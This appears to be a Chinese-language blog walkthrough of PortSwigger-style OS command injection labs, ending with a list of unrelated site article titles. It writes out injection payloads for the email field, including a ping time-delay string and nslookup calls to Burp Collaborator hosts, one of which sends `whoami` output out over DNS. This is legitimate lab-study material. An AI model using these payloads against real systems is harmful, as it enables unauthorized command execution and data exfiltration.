1.OS command injection, simple case。
最简单的命令执行,【|】 两个只要有一个为True就执行
2.Blind OS command injection with time delays
有时间延迟的盲命令注入
点击Submits feedback
email里先截断||再输入命令再隔离||
123@123.123||ping+-c+10+127.0.0.1||
3.Blind OS command injection with output redirection
带输出重定向的盲命令注入
先通过email写入一个文件,然后通过加载图片的filename调用该文件
首页抓包修改filename参数命令注入:
这里必须写入output.txt,其他没有的文件无法读取: no such file
4.Blind OS command injection with out-of-band interaction
带外交互的盲命令注入,需要使用Burp Collaborator
email=x||nslookup+burpcollaborator.net||
||nslookup+6mt98naz1z5qfv5laxona3nh68cy0n.burpcollaborator.net||
5.Blind OS command injection with out-of-band data exfiltration
带外数据渗透的盲命令注入,需要使用Burp Collaborator
email=||nslookup+`whoami`.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
+必须有,【`whoami`.】必须有。输出格式是whoami.client
 

最新文章

  1. MailKit系列之---查询SearchQuery
  2. Html中<font>标签的使用
  3. Node.js process 模块常用属性和方法
  4. ubuntu下安装JDK并搭建activeMQ
  5. Noip2016のmengbier
  6. Objective-C学习笔记-第一天(3)
  7. PHP中header用法详解带范例(转)
  8. Jenkins iOS – Git, xcodebuild, TestFlight
  9. SQL Server执行计划
  10. linux配置记录
  11. 如何在通过knockout数据绑定的DOM元素上添加事件
  12. input复选框操作的部分高频率使用代码
  13. 再好好聊聊 HTTP 里的 Cookie | 实用 HTTP
  14. 神州数码NAT地址转换配置
  15. Luffy之登录认证以及JWT
  16. 删除Git管理的文件
  17. 剑指offer编程题Java实现——面试题4后的相关题目
  18. 微信小程序——倒计时功能
  19. wildfly8+jpa EntityBean 简单入门
  20. Android系列教程(十六) 在电脑上装Android

热门文章

  1. 使用字节流丢读取中文的问题-Reader类
  2. Unity之生成扫描二维码
  3. 读Java8函数式编程笔记03_高级集合类和收集器
  4. OPA-CH32x系列芯片OPA使用注意事项
  5. 腾讯出品小程序自动化测试框架【Minium】系列(六)常见组件的处理
  6. 从 PyTorch DDP 到 Accelerate 到 Trainer,轻松掌握分布式训练
  7. P6329 【模板】点分树 | 震波
  8. Destroying Roads
  9. slate源码解析(二)- 基本框架与数据模型
  10. Postgresql清理WAL日志